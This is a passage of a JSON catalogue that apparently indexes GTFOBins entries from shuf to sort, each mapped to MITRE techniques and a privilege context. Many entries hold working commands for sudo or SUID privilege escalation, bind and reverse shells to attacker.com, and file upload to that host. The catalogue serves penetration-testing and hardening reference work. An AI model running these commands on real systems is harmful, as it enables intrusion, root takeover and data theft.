host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shuf:file-read:0:sudo","toolId":"gtfo:shuf","toolName":"shuf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"shuf -z /path/to/input-file","description":"The read file content is corrupted by randomizing the order of NUL terminated strings.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/shuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shuf:file-read:0:suid","toolId":"gtfo:shuf","toolName":"shuf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"shuf -z /path/to/input-file","description":"The read file content is corrupted by randomizing the order of NUL terminated strings.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/shuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shuf:file-read:0:unprivileged","toolId":"gtfo:shuf","toolName":"shuf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"shuf -z /path/to/input-file","description":"The read file content is corrupted by randomizing the order of NUL terminated strings.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/shuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shuf:file-write:0:sudo","toolId":"gtfo:shuf","toolName":"shuf","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shuf -e DATA -o /path/to/output-file","description":"The written file content is corrupted by adding a newline.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/shuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shuf:file-write:0:suid","toolId":"gtfo:shuf","toolName":"shuf","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shuf -e DATA -o /path/to/output-file","description":"The written file content is corrupted by adding a newline.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/shuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:shuf:file-write:0:unprivileged","toolId":"gtfo:shuf","toolName":"shuf","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"shuf -e DATA -o /path/to/output-file","description":"The written file content is corrupted by adding a newline.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/shuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:slsh:shell:0:sudo","toolId":"gtfo:slsh","toolName":"slsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"slsh -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/slsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:slsh:shell:0:suid","toolId":"gtfo:slsh","toolName":"slsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"slsh -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/slsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:slsh:shell:0:unprivileged","toolId":"gtfo:slsh","toolName":"slsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"slsh -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/slsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:smbclient:download:0:sudo","toolId":"gtfo:smbclient","toolName":"smbclient","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"smbclient '\\\\attacker.com\\share' -c 'get /path/to/input-file /path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/smbclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:smbclient:download:0:unprivileged","toolId":"gtfo:smbclient","toolName":"smbclient","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"smbclient '\\\\attacker.com\\share' -c 'get /path/to/input-file /path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/smbclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:smbclient:shell:0:sudo","toolId":"gtfo:smbclient","toolName":"smbclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"smbclient '\\\\host\\share'\n!/bin/sh","description":"A valid SMB/CIFS server must be available.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/smbclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:smbclient:shell:0:unprivileged","toolId":"gtfo:smbclient","toolName":"smbclient","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"smbclient '\\\\host\\share'\n!/bin/sh","description":"A valid SMB/CIFS server must be available.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/smbclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:smbclient:upload:0:sudo","toolId":"gtfo:smbclient","toolName":"smbclient","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"smbclient '\\\\attacker.com\\share' -c 'put /path/to/input-file /path/to/output-file'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/smbclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:smbclient:upload:0:unprivileged","toolId":"gtfo:smbclient","toolName":"smbclient","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"smbclient '\\\\attacker.com\\share' -c 'put /path/to/input-file /path/to/output-file'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/smbclient/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:snap:command:0:sudo","toolId":"gtfo:snap","toolName":"snap","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"snap install xxxx_1.0_all.snap --dangerous --devmode","description":"Generate the Snap package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\nmkdir -p meta/hooks\necho -e '#!/bin/sh\\n/path/to/command; false' >meta/hooks/install\nchmod +x meta/hooks/install\nfpm -n xxxx -s dir -t snap -a all meta\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/snap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:bind-shell:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socat tcp-listen:12345,reuseaddr,fork exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:bind-shell:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socat tcp-listen:12345,reuseaddr,fork 'exec:/bin/sh -p,pty,stderr,setsid,sigint,sane'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:bind-shell:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"socat tcp-listen:12345,reuseaddr,fork exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:download:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:download:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:download:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:file-read:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"socat -u file:/path/to/input-file -","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:file-read:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"socat -u file:/path/to/input-file -","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:file-read:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"socat -u file:/path/to/input-file -","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:file-write:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"socat -u 'exec:echo DATA' open:/path/to/output-file,creat","description":"The `echo` command is actually used.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:file-write:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"socat -u 'exec:echo DATA' open:/path/to/output-file,creat","description":"The `echo` command is actually used.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:file-write:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"socat -u 'exec:echo DATA' open:/path/to/output-file,creat","description":"The `echo` command is actually used.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:reverse-shell:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socat tcp-connect:attacker.com:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:reverse-shell:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socat tcp-connect:attacker.com:12345 'exec:/bin/sh -p,pty,stderr,setsid,sigint,sane'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:reverse-shell:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"socat tcp-connect:attacker.com:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:shell:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"socat - exec:/bin/sh,pty,ctty,raw,echo=0","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:shell:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"socat - 'exec:/bin/sh -p,pty,ctty,raw,echo=0'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:shell:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"socat - exec:/bin/sh,pty,ctty,raw,echo=0","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:upload:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"socat -u file:/path/to/input-file tcp-connect:attacker.com:12345","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:upload:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"socat -u file:/path/to/input-file tcp-connect:attacker.com:12345","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socat:upload:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"socat -u file:/path/to/input-file tcp-connect:attacker.com:12345","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socket:bind-shell:0:sudo","toolId":"gtfo:socket","toolName":"socket","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socket -svp '/bin/sh -i' 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socket/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socket:bind-shell:0:suid","toolId":"gtfo:socket","toolName":"socket","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socket -svp '/bin/sh -i' 12345","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socket/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socket:bind-shell:0:unprivileged","toolId":"gtfo:socket","toolName":"socket","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"socket -svp '/bin/sh -i' 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socket/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socket:reverse-shell:0:sudo","toolId":"gtfo:socket","toolName":"socket","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socket -qvp '/bin/sh -i' attacker.com 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socket/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socket:reverse-shell:0:suid","toolId":"gtfo:socket","toolName":"socket","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socket -qvp '/bin/sh -i' attacker.com 12345","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socket/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:socket:reverse-shell:0:unprivileged","toolId":"gtfo:socket","toolName":"socket","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"socket -qvp '/bin/sh -i' attacker.com 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socket/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:soelim:file-read:0:sudo","toolId":"gtfo:soelim","toolName":"soelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"soelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/soelim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:soelim:file-read:0:suid","toolId":"gtfo:soelim","toolName":"soelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"soelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/soelim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:soelim:file-read:0:unprivileged","toolId":"gtfo:soelim","toolName":"soelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"soelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/soelim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:softlimit:shell:0:sudo","toolId":"gtfo:softlimit","toolName":"softlimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"softlimit /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/softlimit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:softlimit:shell:0:suid","toolId":"gtfo:softlimit","toolName":"softlimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"softlimit /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/softlimit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:softlimit:shell:0:unprivileged","toolId":"gtfo:softlimit","toolName":"softlimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"softlimit /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/softlimit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sort:file-read:0:sudo","toolId":"gtfo:sort","toolName":"sort","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sort -m /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sort/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sort:file-read:0:suid","toolId":"gtfo:sort","toolName":"sort","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sort -m /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sort/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sort:file-read:0:unprivileged","toolId":"gtfo:sort","toolName":"sort","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sort -m /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sort/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sort:file-write:0:sudo","toolId":"gtfo:sort","toolName":"sort","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | sort -m -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sort/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sort:file-write:0:suid","toolId":"gtfo:sort","toolName":"sort","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | sort -m -o 